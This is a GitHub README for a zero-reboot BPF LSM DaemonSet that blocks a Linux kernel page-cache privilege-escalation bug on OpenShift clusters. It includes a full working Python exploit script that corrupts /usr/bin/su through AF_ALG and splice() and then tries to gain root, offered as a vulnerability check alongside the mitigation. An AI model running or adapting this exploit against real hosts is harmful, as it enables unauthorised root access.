mrunalp/block-copyfail

GitHub: mrunalp/block-copyfail

A BPF LSM-based DaemonSet that immediately blocks the CVE-2026-31431 kernel privilege-escalation exploit chain without rebooting OpenShift nodes.

Stars: 1 | Forks: 2

## Summary

CVE-2026-31431 ("Copy Fail") is a Linux kernel privilege-escalation vulnerability in the `algif_aead` crypto interface. An attacker uses an AF\_ALG socket with the `authencesn` algorithm together with `splice()` to corrupt arbitrary files in the kernel page cache, including setuid binaries such as `/usr/bin/su`.

This document provides a **zero-reboot fix** using a BPF LSM DaemonSet that blocks only binds of the vulnerable `authencesn` algorithm. The approach has been tested end to end on three separate OCP 4.22 clusters.

## Quick Start

```
# 1. Verify that BPF LSM is enabled (on by default in RHEL CoreOS 9.8)
oc debug node/<node-name> -- chroot /host cat /sys/kernel/security/lsm
# Must include "bpf"

# 2. Deploy the namespace and grant the privileged SCC
oc apply -f daemonset.yaml
oc adm policy add-scc-to-user privileged -z default -n block-copyfail

# 3. DaemonSet pods start automatically on all nodes

# 4. Verify
oc get pods -n block-copyfail   # All nodes should show Running
oc logs -n block-copyfail -l app=block-copyfail
# Expected: "block-copyfail: blocker active — authencesn bind blocked"
```

No reboot. No node drain. No pod restarts. Protection takes effect immediately and covers every process on every node (100% coverage).

## Table of Contents

1. [How the Exploit Works](#how-the-exploit-works)
2. [Confirming Vulnerability on Your Cluster](#confirming-vulnerability-on-your-cluster)
3. [BPF LSM DaemonSet Deployment](#bpf-lsm-daemonset-deployment)
4. [Post-Deployment Verification](#post-deployment-verification)
5. [Building the Image from Source](#building-the-image-from-source)
6. [Removal](#removal)

## How the Exploit Works

The exploit chains three kernel features:

1. **AF\_ALG socket**: creates a userspace handle to kernel crypto via `socket(AF_ALG, SOCK_SEQPACKET, 0)`
2. **AEAD bind**: binds to `authencesn(hmac(sha256),cbc(aes))`, a specific authenticated-encryption algorithm
3. **splice() + sendmsg()**: the kernel incorrectly performs an "in-place" operation when the source and destination page mappings differ, corrupting the page cache of a read-only file

The attacker corrupts `/usr/bin/su` in the page cache (no write permission on the file is needed) and then executes it to gain root.

## Confirming Vulnerability on Your Cluster

### Step 1: Save the test script

Save the following as `cve_test.py`. It reproduces the page-cache corruption of the original exploit against `/usr/bin/su`, using the same payload. The corruption affects only the container's overlayfs copy, not the host.

```
#!/usr/bin/env python3
"""CVE-2026-31431 vulnerability test targeting /usr/bin/su."""
import os, sys, socket, hashlib, zlib, ctypes, ctypes.util, subprocess

libc = ctypes.CDLL(ctypes.util.find_library("c"))
libc.splice.argtypes = [
    ctypes.c_int, ctypes.POINTER(ctypes.c_longlong),
    ctypes.c_int, ctypes.POINTER(ctypes.c_longlong),
    ctypes.c_size_t, ctypes.c_uint,
]
libc.splice.restype = ctypes.c_longlong


def _splice(fd_in, fd_out, length, offset_src=None):
    if offset_src is not None:
        off = ctypes.c_longlong(offset_src)
        return libc.splice(fd_in, ctypes.byref(off), fd_out, None, length, 0)
    return libc.splice(fd_in, None, fd_out, None, length, 0)


def d(x):
    return bytes.fromhex(x)


def try_corrupt(fd, offset, payload):
    SOL_ALG = 279
    try:
        a = socket.socket(38, 5, 0)
    except OSError as e:
        print(f" AF_ALG socket creation failed: {e}")
        return False
    try:
        a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    except OSError as e:
        print(f" AF_ALG bind failed: {e}")
        a.close()
        return False
    try:
        a.setsockopt(SOL_ALG, 1, d('0800010000000010' + '0' * 64))
        a.setsockopt(SOL_ALG, 5, None, 4)
        u, _ = a.accept()
        o = offset + 4
        z = d('00')
        u.sendmsg(
            [b"A" * 4 + payload],
            [(SOL_ALG, 3, z * 4),
             (SOL_ALG, 2, b'\x10' + z * 19),
             (SOL_ALG, 4, b'\x08' + z * 3)],
            32768,
        )
        r, w = os.pipe()
        _splice(fd, w, o, offset_src=0)
        _splice(r, u.fileno(), o)
        try:
            u.recv(8 + offset)
        except Exception:
            pass
        os.close(r)
        os.close(w)
        u.close()
    except OSError as e:
        print(f" Exploit step failed: {e}")
        a.close()
        return False
    a.close()
    return True


TARGET = "/usr/bin/su"
print("=== CVE-2026-31431 Vulnerability Test ===")
print(f"Target: {TARGET}")
print()

with open(TARGET, "rb") as f:
    orig_hash = hashlib.sha256(f.read()).hexdigest()
print(f"Original SHA256: {orig_hash}")

payload = zlib.decompress(d(
    "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d"
    "209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675"
    "c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
))

fd = os.open(TARGET, os.O_RDONLY)
i = 0
ok = True
print(f"Attempting splice + AF_ALG page-cache corruption "
      f"({len(payload)} bytes in {len(payload)//4} chunks)...")
while i < len(payload):
    if not try_corrupt(fd, i, payload[i:i+4]):
        ok = False
        break
    i += 4
os.close(fd)

if not ok:
    print()
    print("RESULT: CANNOT TEST - AF_ALG or splice not available/permitted")
    sys.exit(2)

with open(TARGET, "rb") as f:
    after_hash = hashlib.sha256(f.read()).hexdigest()
print(f"After SHA256: {after_hash}")
print()

if orig_hash != after_hash:
    print("PAGE CACHE CORRUPTION: YES - /usr/bin/su was modified in the page cache")
else:
    print("PAGE CACHE CORRUPTION: NO - /usr/bin/su is intact")
    print()
    print("RESULT: NOT VULNERABLE")
    sys.exit(0)

print()
print("Attempting to execute corrupted /usr/bin/su ...")
try:
    r = subprocess.run([TARGET, "-c", "id"], capture_output=True, timeout=5)
    stdout = r.stdout.decode(errors="replace").strip()
    stderr = r.stderr.decode(errors="replace").strip()
    print(f" exit code: {r.returncode}")
    if stdout:
        print(f" stdout: {stdout}")
    if stderr:
        print(f" stderr: {stderr}")
    if "uid=0" in stdout:
        print()
        print("RESULT: FULLY EXPLOITABLE - gained root via corrupted su")
    else:
        print()
        print("RESULT: PARTIALLY MITIGATED")
        print(" Page-cache corruption succeeded (kernel is vulnerable)")
        print(" Privilege escalation blocked (allowPrivilegeEscalation=false)")
except Exception as e:
    print(f" execution failed: {e}")
    print()
    print("RESULT: PARTIALLY MITIGATED")
    print(" Page-cache corruption succeeded (kernel is vulnerable)")
    print(" Corrupted binary could not execute")
```

### Step 2: Run the test on the cluster

```
oc create namespace cve-test
oc create configmap cve-test-script -n cve-test --from-file=cve_test.py

cat <<'EOF' | oc apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: cve-test
  namespace: cve-test
  annotations:
    openshift.io/required-scc: restricted-v2
spec:
  restartPolicy: Never
  containers:
  - name: test
    image: registry.access.redhat.com/ubi9/python-39:latest
    command: ["python3", "/scripts/cve_test.py"]
    volumeMounts:
    - name: script
      mountPath: /scripts
      readOnly: true
  volumes:
  - name: script
    configMap:
      name: cve-test-script
EOF
```

### Step 3: Check the result

```
oc wait pod/cve-test -n cve-test \
  --for=jsonpath='{.status.phase}'=Succeeded --timeout=120s
oc logs -n cve-test cve-test
```

**On a vulnerable cluster**, you will see:

```
=== CVE-2026-31431 Vulnerability Test ===
Target: /usr/bin/su

Original SHA256: 8969560ae8e6e21c6184c1451f59418822ee69dd5d946d71987b55236bbc0feb
Attempting splice + AF_ALG page-cache corruption (160 bytes in 40 chunks)...
After SHA256: 30b0f5b5a054c4df65b48ca792863bf7054b4d793f15f57163792ba6c2b151ae

PAGE CACHE CORRUPTION: YES - /usr/bin/su was modified in the page cache

Attempting to execute corrupted /usr/bin/su ...
 exit code: 0

RESULT: PARTIALLY MITIGATED
 Page-cache corruption succeeded (kernel is vulnerable)
 Privilege escalation blocked (allowPrivilegeEscalation=false)
```

### Step 4: Clean up

```
oc delete namespace cve-test
```

## BPF LSM DaemonSet Deployment

The BPF LSM approach hooks `socket_bind` at the kernel level and blocks binds of the `authencesn` algorithm only. It is based on [block-copyfail](https://github.com/atgreen/block-copyfail), rewritten in C with libbpf to make OCP deployment easier.

### Prerequisites

BPF LSM must be enabled. It is enabled by default on RHEL CoreOS 9.8 (OCP 4.22). Verify with:

```
oc debug node/<node-name> -- chroot /host cat /sys/kernel/security/lsm
```

The expected output includes `bpf`:

```
lockdown,capability,landlock,yama,selinux,bpf
```

If `bpf` is **not** present, a one-time MachineConfig is required (this is the only scenario that needs a reboot):

```
apiVersion: machineconfiguration.openshift.io/v1
kind: MachineConfig
metadata:
  labels:
    machineconfiguration.openshift.io/role: worker
  name: 99-enable-bpf-lsm
spec:
  kernelArguments:
  - lsm=lockdown,capability,selinux,bpf
```

### Step 1: Create the namespace, grant the SCC, and deploy

The privileged SCC must be granted before the DaemonSet pods are created; otherwise pod creation fails with an SCC validation error.

```
# Create the namespace
cat <<'EOF' | oc apply -f -
apiVersion: v1
kind: Namespace
metadata:
  name: block-copyfail
  labels:
    pod-security.kubernetes.io/enforce: privileged
    pod-security.kubernetes.io/audit: privileged
    pod-security.kubernetes.io/warn: privileged
EOF

# Grant the privileged SCC to the default service account
oc adm policy add-scc-to-user privileged -z default -n block-copyfail

# Deploy the DaemonSet
cat <<'EOF' | oc apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: block-copyfail
  namespace: block-copyfail
  labels:
    app: block-copyfail
spec:
  selector:
    matchLabels:
      app: block-copyfail
  template:
    metadata:
      labels:
        app: block-copyfail
    spec:
      priorityClassName: system-node-critical
      tolerations:
      - operator: Exists
      containers:
      - name: blocker
        image: quay.io/mrunalp/block-copyfail:latest
        securityContext:
          privileged: true
        volumeMounts:
        - name: bpf
          mountPath: /sys/fs/bpf
        - name: btf
          mountPath: /sys/kernel/btf/vmlinux
          readOnly: true
        resources:
          requests:
            cpu: 10m
            memory: 32Mi
          limits:
            cpu: 100m
            memory: 64Mi
      volumes:
      - name: bpf
        hostPath:
          path: /sys/fs/bpf
          type: DirectoryOrCreate
      - name: btf
        hostPath:
          path: /sys/kernel/btf/vmlinux
          type: File
      terminationGracePeriodSeconds: 5
EOF
```

### Step 2: Wait for pods to start on all nodes

```
oc get pods -n block-copyfail -o wide
```

Expected: one pod per node, all in the `Running` state:

```
NAME                   READY   STATUS    AGE   NODE
block-copyfail-2jhzf   1/1     Running   34s   ci-...-master-2
block-copyfail-4dfq7   1/1     Running   34s   ci-...-master-1
block-copyfail-c2ts8   1/1     Running   34s   ci-...-worker-c
block-copyfail-ctblk   1/1     Running   34s   ci-...-worker-a
block-copyfail-m26sx   1/1     Running   34s   ci-...-worker-b
block-copyfail-xsh6d   1/1     Running   34s   ci-...-master-0
```

### Step 3: Verify that the blocker is active

```
oc logs -n block-copyfail -l app=block-copyfail
```

Expected:

```
block-copyfail: blocker active — authencesn bind blocked
```

## Post-Deployment Verification

Re-run the same exploit test from the [Confirming Vulnerability](#confirming-vulnerability-on-your-cluster) section.

**After the BPF LSM DaemonSet is deployed**, the output will be:

```
=== CVE-2026-31431 Vulnerability Test ===
Target: /usr/bin/su

Original SHA256: 30b0f5b5a054c4df65b48ca792863bf7054b4d793f15f57163792ba6c2b151ae
Attempting splice + AF_ALG page-cache corruption (160 bytes in 40 chunks)...
 AF_ALG bind failed: [Errno 1] Operation not permitted

RESULT: CANNOT TEST - AF_ALG or splice not available/permitted
```

The DaemonSet logs will show the blocked attempt:

```
oc logs -n block-copyfail -l app=block-copyfail
```

```
block-copyfail: blocker active — authencesn bind blocked
block-copyfail: BLOCKED pid=16777 comm=python3 time=2026-05-01 16:37:23
```

### Verify that other algorithms are unaffected

Run `verify-algos.py` on a node to confirm that only `authencesn` is blocked and that other AF\_ALG algorithms (GCM, CCM, SHA-256, AES-CBC) continue to work:

```
oc debug node/<node-name> -- chroot /host python3 -c "
import socket
tests = [
    ('aead', 'gcm(aes)'),
    ('aead', 'ccm(aes)'),
    ('aead', 'rfc4106(gcm(aes))'),
    ('hash', 'sha256'),
    ('skcipher', 'cbc(aes)'),
    ('aead', 'authencesn(hmac(sha256),cbc(aes))'),
]
for t, n in tests:
    s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
    try:
        s.bind((t, n))
        print(f' ALLOWED {t}/{n}')
    except OSError as e:
        print(f' BLOCKED {t}/{n} -- {e}')
    finally:
        s.close()
"
```

Expected output:

```
 ALLOWED aead/gcm(aes)
 ALLOWED aead/ccm(aes)
 ALLOWED aead/rfc4106(gcm(aes))
 ALLOWED hash/sha256
 ALLOWED skcipher/cbc(aes)
 BLOCKED aead/authencesn(hmac(sha256),cbc(aes)) -- [Errno 1] Operation not permitted
```

This confirms that the BPF LSM program blocks only the vulnerable algorithm.

## Building the Image from Source

The source for the BPF LSM blocker is in `block-copyfail/`:

```
block-copyfail/
  block_copyfail.bpf.c   # BPF kernel program (LSM hook)
  block_copyfail.c       # Userspace loader (libbpf skeleton)
  block_copyfail.h       # Shared event struct
  Makefile               # Build pipeline
  Dockerfile             # Multi-stage build
  daemonset.yaml         # Namespace + DaemonSet manifest
  trigger-test.py        # Quick validation script
```

Build and push:

```
cd block-copyfail/
podman build -t quay.io/<your-org>/block-copyfail:latest .
podman push quay.io/<your-org>/block-copyfail:latest
```

The Dockerfile uses a multi-stage build: Fedora with clang/bpftool/libbpf-devel for compilation, and UBI 9 minimal as the runtime image (about 122 MB).

## Removal

Deleting the DaemonSet immediately removes the mitigation from all nodes:

```
oc delete -f daemonset.yaml
# or
oc delete namespace block-copyfail
```

The BPF program detaches automatically when the loader process exits. No reboot or pod restart is needed.
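
To check from a single node whether the mitigation is currently in effect (for example before deployment, after deployment, or after removal), the bind probe used in the verification steps can be reduced to one algorithm. The following is a minimal sketch, not part of the repository: the names `classify_bind_error` and `probe_authencesn` are hypothetical, and it assumes that a blocked bind surfaces as `EPERM` (as in the logs shown in this document) and that an algorithm missing from the kernel typically surfaces as `ENOENT`.

```python
import errno
import socket

# Algorithm string taken from this document; everything else here is illustrative.
VULNERABLE_ALG = ("aead", "authencesn(hmac(sha256),cbc(aes))")


def classify_bind_error(err):
    """Map the outcome of an AF_ALG bind() to a short status string."""
    if err is None:
        return "allowed"                 # bind succeeded: no blocker in effect
    if err.errno == errno.EPERM:
        return "blocked"                 # matches "[Errno 1] Operation not permitted"
    if err.errno == errno.ENOENT:
        return "algorithm-unavailable"   # assumption: kernel lacks the algorithm
    return "error"


def probe_authencesn():
    """Try to bind the vulnerable algorithm and report what happened."""
    af_alg = getattr(socket, "AF_ALG", None)  # only defined on Linux
    if af_alg is None:
        return "af-alg-unsupported"
    try:
        sock = socket.socket(af_alg, socket.SOCK_SEQPACKET, 0)
    except OSError:
        return "af-alg-unsupported"
    try:
        sock.bind(VULNERABLE_ALG)
        return classify_bind_error(None)
    except OSError as exc:
        return classify_bind_error(exc)
    finally:
        sock.close()


if __name__ == "__main__":
    print(f"authencesn bind: {probe_authencesn()}")
```

The probe only attempts the bind and closes the socket; it does not send data or call `splice()`. With the DaemonSet running, the result should be `blocked`; once the DaemonSet is removed and the BPF program has detached, the same probe should report `allowed` on a kernel that provides the algorithm.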
